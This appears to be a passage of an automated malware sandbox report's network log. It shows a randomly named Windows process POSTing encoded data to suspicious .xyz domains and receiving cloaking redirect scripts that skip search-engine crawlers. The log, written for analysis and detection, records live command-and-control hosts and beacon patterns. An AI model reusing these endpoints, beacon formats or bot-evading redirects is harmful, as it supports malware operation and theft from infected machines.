                                              Data Raw: 37 4c 59 3d 54 43 77 67 2b 6c 31 4a 52 35 6f 62 48 58 6f 70 45 4d 38 38 74 35 6e 6a 35 70 6f 4b 70 53 36 4d 6b 2b 78 6f 56 36 30 65 61 41 42 61 5a 59 6e 4f 55 73 6f 44 6f 74 45 6c 73 4f 52 51 6f 42 4c 6e 73 74 54 50 6a 37 6d 6b 59 4c 44 56 46 52 37 35 67 6a 72 54 69 70 46 2b 54 54 58 4c 31 5a 33 69 5a 68 63 70 51 77 67 6c 2f 6c 53 74 61 4f 4e 74 39 5a 31 69 45 31 70 32 78 34 67 4e 6f 61 50 47 6b 62 42 59 38 31 36 38 76 4a 5a 56 66 4f 58 4c 62 6a 52 57 74 6b 48 56 67 74 6f 52 54 74 52 4a 63 65 47 4e 54 39 2b 6b 4f 75 38 33 44 69 4b 4e 33 71 38 4b 33 63 69 4d 73 59 54 63 50 47 57 70 4b 35 44 6c 4a 4c 72 39 58 7a 45 7a 47 2b 32 67 41 6b 64 46 54 4a 51 3d
                                              Data Ascii: 7LY=TCwg+l1JR5obHXopEM88t5nj5poKpS6Mk+xoV60eaABaZYnOUsoDotElsORQoBLnstTPj7mkYLDVFR75gjrTipF+TTXL1Z3iZhcpQwgl/lStaONt9Z1iE1p2x4gNoaPGkbBY8168vJZVfOXLbjRWtkHVgtoRTtRJceGNT9+kOu83DiKN3q8K3ciMsYTcPGWpK5DlJLr9XzEzG+2gAkdFTJQ=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.11.30499083.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:16.448823929 CEST2578OUTPOST /l390/ HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.leadlikeyoumeanit.xyz
                                              Referer: http://www.leadlikeyoumeanit.xyz/l390/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 54 43 77 67 2b 6c 31 4a 52 35 6f 62 48 58 6f 70 45 4d 38 38 74 35 6e 6a 35 70 6f 4b 70 53 36 4d 6b 2b 78 6f 56 36 30 65 61 41 4a 61 59 74 7a 4f 57 4e 6f 44 70 74 45 6c 76 4f 52 52 6f 42 4c 36 73 75 6a 54 6a 37 71 30 59 4f 48 56 45 33 6e 35 78 6e 2f 54 72 70 46 2b 64 44 58 4b 71 4a 32 67 5a 69 6b 74 51 77 77 6c 2f 6c 53 74 61 4c 42 74 2b 4d 5a 69 47 31 70 31 32 34 67 42 2f 4b 50 75 6b 62 5a 49 38 30 50 4a 76 4d 74 56 65 2f 48 4c 62 78 35 57 74 6b 48 56 6c 74 6f 53 54 74 63 75 63 65 65 5a 54 38 32 72 50 64 77 33 42 54 6e 6d 69 6f 70 56 6a 2b 36 30 68 73 62 6b 4d 48 71 6f 4c 5a 6a 37 45 59 6e 6a 52 48 46 64 4e 59 2f 2f 46 6d 78 41 46 65 55 47 67 55 65 38 59 78 32 56 6e 6c 39 69 52 68 70 39 4f 76 45 2b 32 63 51 7a 63 41 34 4c 48 2b 43 38 4e 37 39 57 5a 4e 43 74 54 70 6b 71 62 4f 68 45 39 7a 38 5a 63 47 62 39 58 59 7a 75 7a 5a 42 7a 55 4f 7a 53 30 66 61 33 48 4d 7a 61 76 52 4a 73 55 30 6e 6d 64 56 73 39 6d 74 66 69 44 56 7a 71 44 31 37 43 37 33 41 50 41 62 42 56 51 42 74 6e 6e 6f 72 61 51 66 [TRUNCATED]
                                              Data Ascii: 7LY=TCwg+l1JR5obHXopEM88t5nj5poKpS6Mk+xoV60eaAJaYtzOWNoDptElvORRoBL6sujTj7q0YOHVE3n5xn/TrpF+dDXKqJ2gZiktQwwl/lStaLBt+MZiG1p124gB/KPukbZI80PJvMtVe/HLbx5WtkHVltoSTtcuceeZT82rPdw3BTnmiopVj+60hsbkMHqoLZj7EYnjRHFdNY//FmxAFeUGgUe8Yx2Vnl9iRhp9OvE+2cQzcA4LH+C8N79WZNCtTpkqbOhE9z8ZcGb9XYzuzZBzUOzS0fa3HMzavRJsU0nmdVs9mtfiDVzqD17C73APAbBVQBtnnoraQfyeDwUmo76SrKqtdRL2mBH0LoIgkM7I+cyuR8B4jEGOc6L/p23E0O08TQxqKrg3E+SVgOjEq5Ifw9FatnbfxJsCczonmaqQkcQKQv1gxNvrmsoqOsGzz5j4X6av63YVwwaY3C4bK+ZBQux+Vn1j6e3t+VDeGQ8UyKrNy4x/EGp4QX12G7GnHJ5mvL7pkCUgTYS9c9pJuY1FCvO8yE9pVbGvQ+91JsCbYbBGmDGWVRP8PoagvMNpnX9sI94uFcRs240ck11B6oqQ2EudICBbf4Br/8X64lIrvp38GyZWqzp29EXTp4DPcog3G+G/2lc7GeAggysLS0gFHmt5P4dYKaM1i3E+7uafZgcr1k6S+q7qP37qSTFhAEDnSxVXIbsNxHxVk8wqyQTH2M6TV4i1Y9hSgjS5L2IaJ1jeAP7bt5qMSWxbKDyDUBEg7N3m6Nxrj6NC+Kb+TKXSGI7uO0por3Tldjpg2wqbo4it0FLxTHtNwC458D40felkjYHuJFt1nPRKJ4fu7IMzVzxKKiyQzjbLgqruqtGZgvkuJeNsDSP0IbCxu381x/xmlcUl0ALknVYUMze594XUR7WuxzxH5aRaCPuJAr/nMp1KSsq4xYxWxLh03uZ57/VrhEpkgrupyfgmLBm/XmgBEISqPPMHRO0+xCqBIxyDtNV8 [TRUNCATED]
                                              Sep 24, 2024 11:27:16.448841095 CEST1347OUTData Raw: 6c 33 63 39 32 73 46 54 39 38 35 6b 56 76 36 62 65 42 56 35 39 65 52 35 35 30 4a 33 48 50 6d 77 79 6d 68 46 74 38 62 46 4b 2b 70 4d 44 5a 79 59 32 4b 72 32 61 6d 54 6e 44 79 47 56 64 57 47 45 79 75 53 62 79 49 66 59 6d 36 64 4d 38 2b 4f 54 6e 53
                                              Data Ascii: l3c92sFT985kVv6beBV59eR550J3HPmwymhFt8bFK+pMDZyY2Kr2amTnDyGVdWGEyuSbyIfYm6dM8+OTnSLpHSrU7lWOqEgGLR3E7383LUPJJ0cisRbKh20F2U/7x7FtXwiStWX5ocO7IEZ1ov8kHwcHiKBWe3Su5/e+vQb8Pch7uggK3NK3gPdvdb9t+RoyjYbRKxaoYogU8XJrQ3GZXpc9/GMJ2QNQgN8rcQC4825CQqCifkk


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.11.30499093.33.130.190804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:19.085753918 CEST501OUTGET /l390/?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s= HTTP/1.1
                                              Host: www.leadlikeyoumeanit.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:19.190804005 CEST390INHTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Tue, 24 Sep 2024 09:27:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 7a 65 3d 43 30 6b 6c 56 54 26 37 4c 59 3d 65 41 59 41 39 53 31 37 45 72 6b 4b 4c 79 6f 6d 4b 76 46 68 6e 5a 65 35 6f 62 6b 57 70 69 48 4a 78 71 74 51 53 4c 77 51 52 77 49 4a 61 72 33 46 65 5a 38 5a 68 50 38 69 72 2f 39 56 70 68 66 4c 72 2b 50 35 37 35 71 59 45 62 48 56 42 78 7a 42 67 78 6e 4c 73 64 56 31 42 7a 6a 45 36 73 76 44 52 6a 70 6d 4a 42 74 39 6b 79 57 75 43 6f 4a 73 32 4b 4d 6f 49 31 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Nze=C0klVT&7LY=eAYA9S17ErkKLyomKvFhnZe5obkWpiHJxqtQSLwQRwIJar3FeZ8ZhP8ir/9VphfLr+P575qYEbHVBxzBgxnLsdV1BzjE6svDRjpmJBt9kyWuCoJs2KMoI1s="}</script></head></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.11.3049910172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:32.662895918 CEST770OUTPOST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 200
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 36 64 76 56 56 58 2f 31 38 65 35 4c 4c 32 58 50 53 38 49 58 68 4e 64 6b 6e 2b 4c 57 31 63 37 62 78 42 2b 2f 63 39 49 68 56 2f 6b 34 34 37 37 6c 65 33 6d 47 56 76 42 46 39 6c 34 6a 78 72 4a 66 50 41 67 39 4d 72 74 51 4a 4f 67 70 75 52 71 6e 73 34 49 5a 51 77 4c 32 46 34 35 4c 54 39 73 57 33 67 51 5a 4a 78 7a 48 55 36 53 76 34 71 2f 6b 35 76 4e 56 4d 67 4e 4d 32 52 78 6b 63 70 43 52 75 6f 71 55 44 67 63 45 55 2b 71 2b 35 67 6f 34 47 32 6c 56 36 37 69 33 72 43 67 58 76 6a 33 79 31 58 36 41 63 70 7a 6a 64 77 70 5a 31 69 78 6f 2b 45 49 67 51 35 69 51 34 32 58 54 35 63 34 53 4e 77 3d 3d
                                              Data Ascii: 7LY=6dvVVX/18e5LL2XPS8IXhNdkn+LW1c7bxB+/c9IhV/k4477le3mGVvBF9l4jxrJfPAg9MrtQJOgpuRqns4IZQwL2F45LT9sW3gQZJxzHU6Sv4q/k5vNVMgNM2RxkcpCRuoqUDgcEU+q+5go4G2lV67i3rCgXvj3y1X6AcpzjdwpZ1ixo+EIgQ5iQ42XT5c4SNw==
                                              Sep 24, 2024 11:27:32.816767931 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 499
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:32 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.11.3049911172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:35.356815100 CEST790OUTPOST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 220
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 36 64 76 56 56 58 2f 31 38 65 35 4c 4c 58 6e 50 43 72 30 58 6e 74 64 72 2b 2b 4c 57 38 38 37 66 78 42 69 2f 63 34 78 73 55 4e 41 34 2f 62 4c 6c 64 79 53 47 59 50 42 46 6c 56 34 69 38 4c 49 54 50 41 6b 31 4d 70 4a 51 4a 4b 41 70 75 55 4f 6e 76 4c 51 57 52 67 4c 4f 4f 59 35 4e 63 64 73 57 33 67 51 5a 4a 78 32 6f 55 36 4b 76 37 62 76 6b 35 4e 6c 57 46 41 4e 4c 2f 78 78 6b 57 4a 43 56 75 6f 71 32 44 68 41 75 55 39 53 2b 35 68 34 34 49 44 46 57 76 72 69 4c 6c 69 67 5a 75 77 6d 35 32 6b 65 79 56 62 6d 35 54 68 39 53 35 56 41 79 6a 48 38 69 44 5a 65 39 6b 33 36 37 37 65 35 4a 51 32 6e 41 66 73 6d 7a 49 63 2b 73 5a 54 66 69 4a 4b 77 2b 32 4f 55 3d
                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNA4/bLldySGYPBFlV4i8LITPAk1MpJQJKApuUOnvLQWRgLOOY5NcdsW3gQZJx2oU6Kv7bvk5NlWFANL/xxkWJCVuoq2DhAuU9S+5h44IDFWvriLligZuwm52keyVbm5Th9S5VAyjH8iDZe9k3677e5JQ2nAfsmzIc+sZTfiJKw+2OU=
                                              Sep 24, 2024 11:27:35.514524937 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 498
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:35 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.11.3049912172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:38.042108059 CEST2578OUTPOST /cwcw/ HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 3336
                                              Origin: http://www.moritynomxd.xyz
                                              Referer: http://www.moritynomxd.xyz/cwcw/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Data Raw: 37 4c 59 3d 36 64 76 56 56 58 2f 31 38 65 35 4c 4c 58 6e 50 43 72 30 58 6e 74 64 72 2b 2b 4c 57 38 38 37 66 78 42 69 2f 63 34 78 73 55 4e 49 34 2f 71 72 6c 66 56 2b 47 58 76 42 46 6f 31 34 5a 38 4c 4a 4a 50 41 63 78 4d 70 31 71 4a 4d 4d 70 76 79 53 6e 71 36 51 57 66 67 4c 4f 42 34 35 49 54 39 74 4f 33 67 41 64 4a 78 6d 6f 55 36 4b 76 37 59 6e 6b 37 66 4e 57 44 41 4e 4d 32 52 78 6f 63 70 43 39 75 72 61 63 44 68 45 55 55 2b 79 2b 34 53 77 34 49 77 74 57 76 72 69 4c 73 43 67 4a 75 77 71 38 32 6b 47 75 56 65 44 4d 53 51 4a 53 70 78 73 6f 32 6a 4d 44 51 4a 53 66 68 45 32 36 73 73 35 33 66 6e 58 44 53 4d 2b 51 48 50 75 63 52 31 62 63 64 61 4d 2f 72 4b 56 42 4f 62 32 79 4e 4e 32 46 72 6e 6c 59 64 7a 2b 41 4c 47 50 51 54 56 4e 33 42 46 68 33 2f 50 32 38 30 2f 67 4c 34 6d 35 4e 44 4a 67 73 36 44 61 44 7a 57 4c 56 70 6d 6b 79 58 55 73 54 53 41 56 79 72 2b 61 48 63 4d 48 6d 64 73 43 4c 66 72 75 72 53 6a 6e 64 4c 6f 50 38 75 50 4f 75 50 6b 59 7a 32 4c 79 4e 56 69 79 5a 43 30 7a 45 54 2b 4c 6e 75 4c 31 30 46 32 [TRUNCATED]
                                              Data Ascii: 7LY=6dvVVX/18e5LLXnPCr0Xntdr++LW887fxBi/c4xsUNI4/qrlfV+GXvBFo14Z8LJJPAcxMp1qJMMpvySnq6QWfgLOB45IT9tO3gAdJxmoU6Kv7Ynk7fNWDANM2RxocpC9uracDhEUU+y+4Sw4IwtWvriLsCgJuwq82kGuVeDMSQJSpxso2jMDQJSfhE26ss53fnXDSM+QHPucR1bcdaM/rKVBOb2yNN2FrnlYdz+ALGPQTVN3BFh3/P280/gL4m5NDJgs6DaDzWLVpmkyXUsTSAVyr+aHcMHmdsCLfrurSjndLoP8uPOuPkYz2LyNViyZC0zET+LnuL10F2QDrKzRTQRIS5MA5+HyDSbWD056AmWz4yP3hF6yf0oZVZjXuoPK9OZ2KI1SUIOEk+INWSeW0LZ9QyEicdhpl1uD3eDt2R9e3Iz4rWwe9MKd8pF47/XadEGRPycbhDLQwTSNgGlVOadlStNtRpIiPiHz5XQv4IRScHMhH+2KWQhGeJyMYMDtRdLO5HgN30ScQTY8DNoVX71YM07yUYY9Roepd47re0o2aRG4/ZkeORO7gVmK2HKtEwY6fg1VrTWZWFrjT0WbyVGEmCkHPkNvtXYsEule1wLqAC/L4x3abJRjv2KOziEEBLVoIxCNr3e6u3F5iEcZwfDYI4XHlQbjgn3NCo6D7KvzV0X0HnI6bxWmJReW68/ZBk5r3Gse0dYaIVZ6JNryWG/L99vrUBDqeVjl47IwUaYn8FjA0WFDRPZj+Wekn7xprNVhp+cCAPhwIyXXwUs3rtPtgv7cOsn1/HF7DVg2QCcmmf1HIbvb+3GREQKtsNBJ4NB6z5IX5w01tZ+EGEGhDS+mZIV6egbDS82r6EBGAVZ0gNA8NzNTGV8dXK+CWVzngED8EXuCrtHZLAFYEqA3waHQUouxUy5lav4SHVpO4oWoVZgyVU0FPH16EM4ILhl7eLg/KUoWpULT5crjpzwBaAbQrLU7jDd78xTBJIzw1YS87QiX [TRUNCATED]
                                              Sep 24, 2024 11:27:38.042128086 CEST1329OUTData Raw: 6a 56 63 2f 55 4b 64 36 36 48 5a 53 52 4e 6e 4f 61 63 72 42 62 46 7a 71 50 5a 75 79 65 51 30 6c 64 79 39 46 69 78 54 43 2b 35 6d 76 58 58 35 65 69 78 2b 45 52 6a 76 46 4a 7a 54 67 4c 64 46 77 77 74 68 50 46 4b 78 4b 7a 72 4b 31 30 75 61 6a 62 79
                                              Data Ascii: jVc/UKd66HZSRNnOacrBbFzqPZuyeQ0ldy9FixTC+5mvXX5eix+ERjvFJzTgLdFwwthPFKxKzrK10uajbyHGAt40CiYdPsB391qAY+IjYJT0QWqPa2tzPjcTHs9WG+AkTpT0FKSJPMBtpSPZWd0W7XIx59PSd9q+HVbxLfbzKadKDlapwLnOX9b8LSIGN4jHUzJ0/F0lcIeI1Ii7lSNCduCIHwt+pPoIyvWqFgZ97PNNhrPSUxC
                                              Sep 24, 2024 11:27:38.196116924 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 497
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:38 GMT
                                              Content-Length: 458
                                              Connection: close
                                              Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED]
                                              Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.11.3049913172.81.61.224804076C:\Program Files (x86)\sRTfwESteimgyUNdYcpBHGWuRjCZcFTrfKQyjbPDAWwPjLavhScFRTvfehzTJNHjs\MzAJhEkohQv.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 24, 2024 11:27:40.726160049 CEST495OUTGET /cwcw/?Nze=C0klVT&7LY=3fH1WiLe5NpDISOWCdAKu+JUhLzC/sqp3A2oBoIvbsZ9+Jm1ViaVTs8UuGIX6p5GG1E2J7RPBqURkEGv9bY/YwLNVIBjQ4Yq7BF1VQnFI9fOsqz7wsM7CnM= HTTP/1.1
                                              Host: www.moritynomxd.xyz
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPNTDF; .NET4.0C)
                                              Sep 24, 2024 11:27:40.880598068 CEST730INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              X-Address: gin_throttle_mw_7200000000_79.127.132.20
                                              X-Ratelimit-Limit: 500
                                              X-Ratelimit-Remaining: 496
                                              X-Ratelimit-Reset: 1727173652
                                              Date: Tue, 24 Sep 2024 09:27:40 GMT
                                              Content-Length: 458
                                              Connection: close
